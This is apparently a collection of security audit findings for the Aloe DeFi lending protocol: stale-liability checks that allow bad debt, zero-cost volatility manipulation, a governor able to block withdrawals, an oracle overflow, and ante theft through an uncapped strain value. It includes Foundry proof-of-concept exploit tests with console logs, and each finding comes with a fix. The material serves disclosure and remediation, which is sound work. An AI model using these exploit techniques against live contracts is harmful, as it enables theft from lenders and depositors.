balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n emit log_named_uint("Before liquidation User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Before liquidation User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint("Before liquidation User assets:", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = 
zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 >> 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 10630197795010000000000\\n Before liquidation User stored
borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end the user's debt is 579 DAI with 0 assets.
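A back-of-the-envelope check of the log above (illustrative Python; numbers rounded to whole DAI):

```python
margin = 51 + 1000        # MAX_LEVERAGE buffer + safety margin, in DAI
borrowed = 10_000
assets = borrowed + margin             # 11_051 DAI held by the Borrower

true_debt = 10_630                     # borrowBalance after ~1 idle day
stored_debt = 10_000                   # borrowBalanceStored, not yet accrued

# modify() checks health against stored_debt, so this withdrawal passes
assets -= 1_000                        # 10_051 DAI remain
assert assets >= stored_debt           # looks healthy to the stale check
assert assets < true_debt              # actually insolvent already
assert true_debt - assets == 579       # ~579 DAI of bad debt, matching the log
```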
Consider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.
A malicious user can create bad debt on his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out all users, it can cause a bank run: the first users to withdraw from the lender will be able to do so, while those who are the last to withdraw will lose their funds.
```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from "src/libraries/constants/Constants.sol";\\nimport {Q96} from "src/libraries/constants/Q.sol";\\nimport {zip} from "src/libraries/Positions.sol";\\n\\nimport "src/Borrower.sol";\\nimport "src/Factory.sol";\\nimport "src/Lender.sol";\\nimport "src/RateModel.sol";\\n\\nimport {FatFactory, VolatilityOracleMock} from "./Utils.sol";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl("mainnet"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n 
lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the "extra" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n emit log_named_uint("Before liquidation User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Before liquidation User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint("Before liquidation User assets:", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), 
type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) 
asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 >> 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n
IV Can be Decreased for Free
high
The liquidity at a single `tickSpacing` is used to calculate the `IV`. The more liquidity is in this tick spacing, the lower the `IV`, as demonstrated by the `tickTvl` dividing the return value of the `estimate` function:\\n```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n\\nSince this uses data only from the block in which the function is called, the liquidity can easily be increased by:\\ndepositing a large amount of liquidity into the `tickSpacing`\\ncalling update\\nremoving the liquidity\\nNote that only a small portion of the pool's total liquidity is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contrast this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE` which limits the amount that IV can be manipulated per update does not sufficiently disincentivise manipulation; it just extends the time period required to manipulate.\\nDecreasing the IV increases the LTV, and due to the free cost, it is reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. With the delay inherent in the TWAP oracle and the liquidation delay of the warn-then-liquidate process, this manipulation can turn price-change-based insolvency from a 5-sigma event (as designed by the protocol) into a likely event.
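The manipulation economics can be sketched numerically (illustrative Python; the formula shape matches the snippet above, `IV ~ sqrt(K / tickTvl)`, while all input magnitudes are made up):

```python
import math

def estimate_iv(volume_gamma0_gamma1, scale, dt, tick_tvl):
    # mirrors: sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.ts - a.ts) / tickTvl)
    return math.sqrt(4e24 * volume_gamma0_gamma1 * scale / dt / tick_tvl)

base = estimate_iv(1e18, 1e6, 3600, 1e21)
# deposit 100x liquidity into the active tickSpacing for one block, call
# update(), then withdraw -- only gas is spent, no trades occur
spiked = estimate_iv(1e18, 1e6, 3600, 100 * 1e21)

assert spiked < base
assert abs(spiked - base / 10) < 1e-6 * base   # 100x tickTvl => IV divided by 10
```

Because IV scales as the inverse square root of `tickTvl`, a 100x single-block liquidity spike cuts the reported IV by a factor of 10, which is why `IV_CHANGE_PER_UPDATE` only slows the attack rather than pricing it out.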
Use the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.
Decreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.
```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n
governor can permanently prevent withdrawals in spite of being restricted
medium
Quoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate, which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set an interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel`, so as not to damage users of the protocol, which is in line with how the `governor` role is described in the README.\\nHowever, the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds at a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario, since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).
The `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.
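A minimal sketch of the proposed clamp, assuming hypothetical names and threshold values (the real `SafeRateLib` wrapper and its constants would differ): once utilization crosses a kink, the governor-supplied model can no longer return a rate below a hard-coded floor.

```python
WAD = 10**18  # 1e18 fixed-point, as used throughout the protocol

def safe_rate(model_rate, utilization, floor_rate=10**16, kink=9 * 10**17):
    # Hypothetical SafeRateLib clamp: above the kink utilization (90%),
    # enforce a minimum rate so a malicious or broken RateModel cannot
    # return 0% while nearly all lender funds are borrowed.
    # floor_rate and kink are illustrative, not protocol values.
    if utilization >= kink:
        return max(model_rate, floor_rate)
    return model_rate

assert safe_rate(0, utilization=95 * WAD // 100) == 10**16  # floor applies
assert safe_rate(0, utilization=WAD // 2) == 0              # model honored
```

Below the kink, the governor keeps full control of the rate curve; the floor only binds exactly in the scenario this finding describes.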
The `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.
```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n
Uniswap Formula Drastically Underestimates Volatilty
medium
Note: This report expresses IV as an annualised percentage, even though the code representation uses a different scaling.\\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued the same as "selling a straddle", a short-volatility strategy which involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanent loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a Uniswap position is above the fair IV, then it is profitable to be a liquidity provider; if it is lower, then it is not.\\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\\nThe assumptions of the efficient market hypothesis hold true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this.
If you are not already a liquidity provider, there is no way to provide "negative liquidity" or "short a liquidity position".\\nIn fact, the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table shows the derived IV at the time of writing having far lower results than the historical volatilities and the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\\nHere is a quote from that exact article, which points out that the Uniswap-derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\\n```\\n"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets."\\n```\\n\\nThe `IV`s in options markets or protocols that have long-short mechanisms, such as Opyn's Squeeth, have a correction mechanism for `IV`s which are too low, because you can both buy and sell options, and they are therefore "correct" according to the Efficient Market Hypothesis. The Uniswap pool is a "long-only" market, where liquidity can be added but not shorted, which leads to a systematically lower `IV` than is realistic. The EMH model, in both its soft and hard forms, only holds when there is a mechanism for a rational minority to profit off correcting a market imbalance.
If many irrational or utilitarian users deposit too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, there's no way to profit off correcting this imbalance.\\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\\nOn-chain data which shows that the liquidity and fee derivation from Uniswap gives far lower results than other markets\\nThe table provided in Lambert Guillaume's article, which shows Uniswap-pool-derived IVs which are far lower than the historical volatilities of the assets.\\nStudies showing that liquidity providers suffer far more impermanent loss than fees.
2 possible options (excuse the pun):\\nUse historical price differences in the Uniswap pool (similar to a TWAP, but a time-weighted average price difference) and use that to infer volatility alongside the current implementation based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The two `IV` calculations can be used to "sanity check" each other, correcting the one that drastically underestimates the risk\\nSame as above, use the `maximum` of the fee/liquidity-derived `IV`, but use a market that has long/short possibilities, such as Opyn's Squeeth, to sanity-check the `IV`.
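The "take the maximum" sanity check above can be sketched in a few lines (function name and inputs are illustrative): whichever concrete estimators are used, combining them with `max` means an attacker has to suppress both signals at once to lower the final IV.

```python
def sanity_checked_iv(iv_fee_based, iv_price_based):
    # Each estimator can under-report in isolation: the fee/liquidity one
    # via a single-block liquidity deposit, the price-history one during a
    # calm window. Taking the max forces an attacker to defeat both.
    return max(iv_fee_based, iv_price_based)

# Fee-derived IV crushed to 30% annualized by a liquidity deposit, but
# realized price movement still implies 80%:
assert sanity_checked_iv(0.30, 0.80) == 0.80
```

The trade-off is asymmetric by design: the combined estimate can only err toward overstating volatility, which degrades capital efficiency slightly but never loosens LTV below what either signal supports.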
The lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol, which would otherwise be basically an impossibility, become possible/likely, as the relationship between `IV` and `Pr(event)` is super-linear.
```\\n"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets."\\n```\\n
Bad debt liquidation doesn't allow liquidator to receive its ETH bonus (ante)
medium
More detailed scenario\\nAlice's account goes into bad debt for whatever reason. For example, the account has 150 DAI borrowed, but only 100 DAI assets.\\nBob tries to `liquidate` Alice's account, but his transaction reverts, because the remaining DAI liability after repaying the 100 DAI assets Alice has will be 50 DAI of bad debt. The `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI, sending it 0.03 WETH. However, since Alice's account has 0 WETH, the transfer will revert.\\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice's bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice's account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has a 0.02 ETH net loss from the liquidation (in addition to gas fees).\\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice's account won't be liquidated and a borrow of 150 will be stuck in Alice's account for a long time.
Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User assets:", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n emit log_named_uint("Liquidated User ante:", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\n
Consider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator its full bonus.
Liquidators are not compensated for bad debt liquidations in some cases. The ante (liquidator bonus) is stuck in the borrower smart contract until the bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead these accounts to accumulate even bigger bad debt and leave lender depositors unable to withdraw their funds from the lender.
```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User assets:", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n emit log_named_uint("Liquidated User ante:", address(account).balance);\\n }\\n```\\n
Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 does
medium
Looking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to an intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are 24 hours (86400 seconds) apart, this can lead to an overflow. Assume for simplicity `target - timeL = timeR - timeL`:\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48\\n```\\n
Perform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\n
The corrupted return value affects the `Volatility` library. Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.
```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n
The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debt
medium
Users face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` greater than 1 results in the liquidator receiving a fraction of the user's collateral, `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (at a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly ("memory-safe") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan.
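The rounding asymmetry is easy to reproduce with plain integer division, mirroring the `div` assembly above (the token amounts below are illustrative stand-ins for the $0.30 / $50 example):

```python
def liquidate_amounts(liabilities, collateral_wei, strain):
    # Mirrors the assembly: repayment is divided by strain and rounds
    # toward zero, while the ETH payout uses the same divisor.
    repay = liabilities // strain
    payout = collateral_wei // strain
    return repay, payout

# ~$0.30 loan denominated in an 8-decimal token (WBTC-scale units)
liabilities = 750
# ~$50 of ETH at $1500, in wei
collateral = 50 * 10**18 // 1500

repay, payout = liquidate_amounts(liabilities, collateral, strain=1_001)

assert repay == 0    # repayment rounds down to zero: nothing is repaid
assert payout > 0    # yet the liquidator still receives an ETH payout
```

Because `repay == 0` costs the attacker nothing but gas, the call can be repeated until the collateral is drained, which is why the recommendation requires a nonzero repayment impact before transferring ETH.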
This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.
